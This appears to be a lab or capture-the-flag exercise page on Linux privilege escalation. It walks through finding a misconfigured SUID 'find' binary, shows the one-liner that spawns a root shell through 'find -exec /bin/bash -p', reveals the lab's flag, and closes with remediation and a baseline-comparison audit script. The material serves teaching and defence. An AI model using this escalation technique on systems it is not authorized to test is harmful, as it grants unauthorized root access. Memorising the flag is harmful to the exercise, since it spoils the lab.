SUID Permission Hunt
Find the misconfigured SUID binary on a simulated box and use it to read a root-only flag.
↳ Based on the lesson: Linux Privilege Escalation
Legal Use Only
This lab is a simulated exercise for your own Kali/CTF VM. Never run SUID searches or privilege escalation techniques against systems you do not own or have explicit written authorization to test. Unauthorized privilege escalation is a criminal offense under the CFAA and equivalent laws worldwide.
Scenario
You've gained an initial shell on a Linux target as a low-privilege user named ctfuser. The target has the hostname vr4cs-lab and you can run commands - but reading /root/flag.txt returns "Permission denied."
The sysadmin made a mistake: one of the installed tools on this box has the SUID bit set when it shouldn't. SUID (Set User ID on execution) means the binary runs as the file's owner (root, in most cases) regardless of who launches it. If a SUID binary allows reading arbitrary files or spawning a shell, it's your path to root.
Your job: find the misconfigured SUID binary and exploit it to read /root/flag.txt.
Your Objective
- Enumerate all SUID binaries on the system
- Identify which one is non-standard (shouldn't have SUID)
- Exploit it to read /root/flag.txt
- Document the exploit path
Hints
Finding SUID Binaries
The find command with -perm -4000 searches for SUID binaries. Run it from / to scan the whole filesystem. Redirect errors to /dev/null so permission-denied noise doesn't pollute your output.
Recognizing Non-Standard SUID
Compare your findings against the standard SUID binaries that ship with a clean Kali install (sudo, passwd, newgrp, su, pkexec, ping, mount, umount). Any SUID binary not in that list is suspicious. Text editors, scripting interpreters (python, perl, bash, vim, less, awk) and file utilities (cp, cat, find) should never have SUID in a properly configured system.
GTFOBins
GTFOBins (gtfobins.github.io) catalogs exactly how to exploit SUID binaries. Search the binary name there - most SUID binaries have a documented SUID exploitation path that drops you to a root shell or lets you read arbitrary files.
Walkthrough
Step 1: Find all SUID binaries
$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/find # <-- this is not standard!
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/find with the SUID bit is the misconfigured binary. find is a standard utility that has no business running as root, so a SUID bit on it means it can be abused.
Step 2: Confirm SUID bit on find
$ ls -la /usr/bin/find
-rwsr-xr-x 1 root root 224112 Oct 5 2023 /usr/bin/find
The s in the owner execute position (rws) confirms the SUID bit is set. This binary will execute as root regardless of who runs it.
Step 3: Exploit using GTFOBins technique
GTFOBins documents that find with SUID can execute arbitrary commands via the -exec flag, running as the effective UID (root):
# Spawn a root shell:
$ /usr/bin/find . -exec /bin/bash -p \; -quit
bash-5.2# whoami
root
bash-5.2# id
uid=1001(ctfuser) gid=1001(ctfuser) euid=0(root)
The -p flag tells bash to preserve the elevated effective UID instead of dropping it. You now have a root-privileged shell.
Step 4: Read the flag
bash-5.2# cat /root/flag.txt
VR4CS{su1d_f1nd_1s_r00t_1n_d1sgu1s3}
Solution
The misconfigured binary was /usr/bin/find with SUID set. The exploit was:
find / -perm -4000 -type f 2>/dev/null # enumerate SUID binaries
/usr/bin/find . -exec /bin/bash -p \; -quit # spawn root shell via find -exec
cat /root/flag.txt # read the flag
Root cause: Someone ran chmod u+s /usr/bin/find on this system - possibly to "make something work" without understanding the security implications. The correct remediation is chmod u-s /usr/bin/find to remove the SUID bit.
Takeaway: SUID is one of the first things to check during Linux privilege escalation. The combination of find -perm -4000 to enumerate and GTFOBins to look up exploitation paths is a standard workflow on every CTF box and real penetration test.
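The baseline comparison from the "Recognizing Non-Standard SUID" hint, written out as a small audit script. This is an added example, not part of the lab: the baseline list is an assumption built from the hint's list plus the two helper binaries in the Step 1 output, and the sample listing is the Step 1 output embedded so the script runs offline.

```shell
#!/bin/sh
# Added example: flag SUID binaries that are not in an expected baseline.
# Baseline (assumed; clean-install SUID set from the lab hint plus the two
# helpers seen in Step 1). Extend it for your own distribution.
SUID_BASELINE='/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/pkexec
/usr/bin/ping
/usr/bin/mount
/usr/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper'

# Constructed sample: the Step 1 listing from the walkthrough.
SAMPLE_LISTING='/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/find
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper'

# Print each path in $1 (newline-separated) that is absent from the baseline.
# grep -x matches whole lines, -F treats the path literally, -q only sets status.
flag_nonstandard_suid() {
    printf '%s\n' "$1" | while IFS= read -r path; do
        [ -n "$path" ] || continue
        if ! printf '%s\n' "$SUID_BASELINE" | grep -qxF -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# Enumerate the live system the same way the lab does (SUID bit, regular
# files, permission errors discarded) and feed the result to the checker.
audit_live_system() {
    flag_nonstandard_suid "$(find / -perm -4000 -type f 2>/dev/null)"
}

# Demo on the constructed sample: the only line printed is /usr/bin/find,
# the candidate for chmod u-s.
flag_nonstandard_suid "$SAMPLE_LISTING"
```

Call audit_live_system instead of the demo line to check a real host; anything it prints is a candidate for removing the SUID bit with chmod u-s.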